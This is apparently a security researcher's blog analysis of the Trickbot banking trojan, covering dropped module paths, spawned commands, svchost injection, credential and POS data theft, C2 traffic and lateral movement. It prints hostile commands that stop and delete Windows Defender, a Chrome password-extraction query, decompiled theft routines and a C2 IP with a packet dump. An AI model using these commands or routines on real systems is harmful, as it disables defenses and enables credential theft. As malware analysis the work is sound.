TRICKBOT
Trickbot is mainly used to steal data. Even though it’s known for financial hacking, it could be used for other reasons as well. Recently I witnessed a ransomware attack in Uganda, where trickbot was used to take control of the network in the first place. In this blog, I will cover the actual executable ONLY and not the first stage MSOFFIC or MSEXCEL dropper.
Trickbot is capable of doing the following:
- ▫ Steal browser, RDP and stored credentials
- ▫ Check email(s)
- ▫ Cryptocurrency usage
- ▫ POS data stealing
- ▫ Steganography
- ▫ Banking theft
- ▫ System information stealing
- ▫ Propagation
- ▫ Network scan/info
The trojan is composed of multiple modules. These modules are PE DLL files that are downloaded to the following locations:
D = DIRECTORY F = FILE ** FOLLOWED BY THE SIZE IN BYTES
-> D: \Users\foo\AppData\Roaming\NetLibs14
-> F: \Users\foo\AppData\Roaming\NetLibs14\
-> D: \Users\foo\AppData\Roaming\NetLibs14\data
-> F: \Users\foo\AppData\Roaming\NetLibs14\settings.ini ** 69496
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\systeminfo64 ** 21168
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64 ** 467392
-> D: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs\dinj ** 141792
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs\sinj ** 176
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs\dpost ** 928
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\pwgrab64 ** 1304928
-> D: \Users\foo\AppData\Roaming\NetLibs14\data\pwgrab64_configs
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\pwgrab64_configs\dpost ** 928
-> F: \Users\foo\AppData\Roaming\NetLibs14\settings.ini ** 0
-> F: \Users\foo\AppData\Roaming\NetLibs14\settings.ini ** 69608
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\psfin64 ** 22192
-> D: \Users\foo\AppData\Roaming\NetLibs14\data\psfin64_configs
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\psfin64_configs\dpost ** 928
All the modules dropped are encrypted with AES256. In some cases, they are encoded with AES + XOR. Decryption information is available in obfuscated setting/config files. On execution, the payload spawns the following commands to collect some useful data and tries to stop MSwindefender service
ipconfig /all
net config workstation
net config workstation
net1 config workstation
net view /all
net view /all /domain
nltest /domain_trusts
nltest /domain_trusts /all_trusts
sc stop WinDefend
sc delete WinDefend
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\foo\AppData\Roaming\WinSocket\IKDVSQW.exe
Each module/DLL is decrypted and loaded in the memory. It’s loaded by spawning svchost.exe and then injecting the decrypted DLL to svchost.exe address space. This would mean that each module would be loaded in a separate instance of svchost.exe. The trojan creates a scheduled task as well.
Let’s look at the flow:
TROJAN IS USING MULTIPLE C2 SERVERS on
MULTIPLE PORTS i.e. 443, 80, 449, 447 etc
As you can see, there are multiple instances of svchost.exe. Because of the scheduled task, taskeng.exe is used. One of the svchost.exe instances has opened a port (19591). This is mainly used for IPC. The first instance of svchost.exe downloads the rest of the modules in an encrypted fashion
=========================== (UDURRANI) =================================
(DATA PUSH!) IS COMING FROM 185.183.99.159 TO IP ADDRESS 172.16.223.132
PORT INFORMATION (447, 49373)
SEQUENCE INFORMATION (2372776804, 3009472621)
|URG:0 | ACK:1 | PSH:1 | RST:0 | SYN:0 | FIN:0|
(1494)
17 03 01 40 20 34 79 38 6D 54 C9 0B B1 13 38 A4 ...@ 4y8mT....8.
0E 86 8F 1F 45 E8 97 DD 5A 32 7A 1C 2E 8B A6 9C ....E...Z2z.....
D2 44 AE E5 1B 16 C7 0B A4 71 BC C5 F4 C0 1F 31 .D.......q.....1
67 0B D7 7B DB F3 22 E2 71 0C BC 33 44 39 7D 45 g..{..".q..3D9}E
69 81 D6 70 DD DB 58 47 0C BD CF 52 8A 9B 1B 25 i..p..XG...R...%
3A BF 7B 48 BF AE 8C 94 FF BE 72 98 4D 69 C6 A6 :.{H......r.Mi..
5A E1 5B 0D 55 77 2D DD F3 A7 63 83 C7 C4 B0 7C Z.[.Uw-...c....|
B2 54 C2 BD D5 66 13 17 E6 D0 71 F8 C7 BE CC A0 .T...f....q.....
D1 A5 A9 AD 85 80 1A 47 20 B7 AE C5 CB 0C 5A 34 .....?.G .....Z4
1E 28 7C 49 8D BB A6 70 F7 F9 EF 1B F8 8C 55 03 .(|I...p......U.
37 8B 5C C2 A6 42 6E 4B 5B 52 E6 BD D7 DF 0A 43 7.\..BnK[R.....C
How are the modules loaded???
The main svchost.exe spawns another instance of svchost.exe -> It decrypts the module -> It injects the module in svchost.exe’s address space
Let’s cover some of the modules:
Stealing application password(s)
func_0(&arg_fo, *(int8_t *)("Grab_Passwords_Chrome(#)” + 0x0), 0x0);
func_1(&arg_f6, *(int8_t *)("\Google\Chrome\User Data\Default\Login Data.bak" + 0x0), 0x0);
select origin_url, username_value, password_value, length(password_value) from logins where blacklisted_by_user = 0
Grab_Passwords_Chrome() success
Stolen credential hashes are stored in the following location
RegOpenKeyExW(0xffffffff80000001, u"Software\Microsoft\Internet Explorer\IntelliForms\Storage2", 0x0, 0x20019, …]);
Same approach is used for other browsers like fireFox and IE
STEALING POS DATA
__func__(rsi, u"DOMAIN GC\r\n", 0x4, r9);
__func__(rsi, u"---------------------------------------------------------------\r\n", 0x4, r9);
__func__(rsi, u"COMPUTERS:\r\n", 0x4, r9);
__func__(rsi, u"POS found: %d\r\n", __func__0__(0x1800055b0, u"*POS*"), r9);
__func__(rsi, u"REG found: %d\r\n", __func__0__(0x1800055b0, u"*REG*"), r9);
__func__(rsi, u"CASH found: %d\r\n", __func__0__(0x1800055b0, u"*CASH*"), r9);
__func__(rsi, u"LANE found: %d\r\n", __func__0__(0x1800055b0, u"*LANE*"), r9);
__func__(rsi, u"STORE found: %d\r\n", __func__0__(0x1800055b0, u"*STORE*"), r9);
__func__(rsi, u"RETAIL found: %d\r\n", __func__0__(0x1800055b0, u"*RETAIL*"), r9);
__func__(rsi, u"BOH found: %d\r\n", __func__0__(0x1800055b0, u"*BOH*"), r9);
__func__(rsi, u"ALOHA found: %d\r\n", __func__0__(0x1800055b0, u"*ALOHA*"), r9);
__func__(rsi, u"MICROS found: %d\r\n", __func__0__(0x1800055b0, u"*MICROS*"), r9);
__func__(rsi, u"TERM found: %d\r\n\r\n", __func__0__(0x1800055b0, u"*TERM*"), r9);
GATHER SYSTEM INFO
SELECT * FROM Win32_OperatingSystem
CSDVersion
ProductType
BuildType
WindowsDirectory
SystemDirectory
BootDevice
SerialNumber
InstallDate
LastBootUpTime
RegisteredUser
Organization
TotalVisibleMemorySize
FreePhysicalMemory
Host Name
OS Name
OS Version
OS Architecture
It will format some info
__func__(rdi, u"Install Date - %02u/%02u/%04u %02d.%02d.%02d\r\n", *(int16_t *)(rbp + 0xffffffffffffff96) & 0xffff, *(int16_t *)(rbp + 0xffffffffffffff92) & 0xffff);
For the product type, it uses a logic and make final verdict i.e. if the victim’s machine Product Type is:
Domain Controller||Server||Workstation
All the information is saved to
NetLibs14/data/module_name_configs/dpost
The main function used to send data to the C2 requires a char * value called “SendReport”
__FUNC__(PTR, rdx, "SendReport" …);
sprintf() is used to save the delimiter / separator value “Arasfjasu7” in buff
sprintf(buff, u"Content-Type: multipart/form-data; boundary=%s", u"Arasfjasu7");
SendReport contains the following functions to send the final report to the C2 and get the response.
- • HttpOpenRequestW
- • InternetOpenW
- • HttpSendRequestW
- • InternetCloseHandle
- • InternetConnectW
- • InternetReadFile
DOMAIN INFO AND LATERAL MOVEMENT
The module looks for NT LM 0.12 i.e. if SMBv1 is in use.
__FUNC__(u”\t\t*****MACHINE IN DOMAIN*****\n", u"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))
This is to get more info on domain and decide if the machine is:
MACHINE IN DOMAIN || MACHINE IN WORKGROUP
NetServerEnum() is used to enumerate all visible domain machines followed by gethostbyname().
It checks for the right privileges, infect the remote machine and call NetApiBufferFree to free the memory.
Conclusion:
Info/Flow for other variants
QUE: ident.me , 1
ANS: 176.58.123.25
QUE: www.download.windowsupdate.com , 5
ANS: 2.20.249.202
ANS: 2.20.249.227
QUE: www.myexternalip.com , 2
ANS: 172.217.169.243
In some cases, the executables are downloaded as .png files. This has nothing to do with steganography, these are plain PE files downloaded as .png or .jpg file extensions